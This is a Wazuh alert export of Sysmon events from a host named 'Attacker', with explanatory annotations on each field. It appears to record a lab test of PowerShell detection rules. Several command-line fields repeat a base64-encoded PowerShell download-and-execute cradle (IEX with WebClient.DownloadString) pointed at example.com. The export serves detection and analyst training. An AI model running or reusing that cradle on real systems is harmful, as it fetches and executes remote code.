data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:31.361
ProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00}
ProcessId: 9136
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kiqaikxm.v25.ps1
CreationUtcTime: 2025-04-24 22:56:31.361
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:31.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c19e-680a-fd0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9136 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kiqaikxm.v25.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:31.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 131 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535396.2869192 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:33.6258405Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350866 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:32.452
ProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00}
ProcessId: 10052
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00}
ParentProcessId: 9136
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:32.452 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9136 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 135 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535396.2877259 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:33.9223709Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350867 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:33.902
ProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00}
ProcessId: 10052
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mhldo5qe.xqb.ps1
CreationUtcTime: 2025-04-24 22:56:33.902
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:33.902 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mhldo5qe.xqb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:33.902 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 132 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535400.2880028 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:38.1224674Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350907 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:35.370
ProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00}
ProcessId: 3616
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00}
ParentProcessId: 10052
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:35.370 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a3-680a-010d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 136 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535400.2888095 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:38.6009870Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350913 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:38.564
ProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00}
ProcessId: 3616
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_alhca2xx.ivy.ps1
CreationUtcTime: 2025-04-24 22:56:38.561
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:38.564 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1a3-680a-010d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_alhca2xx.ivy.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:38.561 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 133 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535403.2890860 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon, so the data fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID. Filter on it to pull Sysmon events only.
data.win.system.eventID: 1 Sysmon event ID, not a Security-log number: 1 = Process Create (4688 is the Security-log counterpart).
data.win.system.version: 5 Schema version of this event type (EID 1 is at v5 here). Field layout changes between versions, so check it when a parser breaks.
data.win.system.level: 4 4 = Informational. Sysmon logs ordinary events at this level; the alert's priority comes from the Wazuh rule, not from here.
data.win.system.task: 1 Task category. For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:41.3926518Z When the record was written to the log (UTC). About 1.5 s after the event's own utcTime here; sequence by utcTime, not by this.
data.win.system.eventRecordID: 350943 Incremental record number in the channel – handy for timeline order. Gaps between alerted records are Sysmon events no rule promoted.
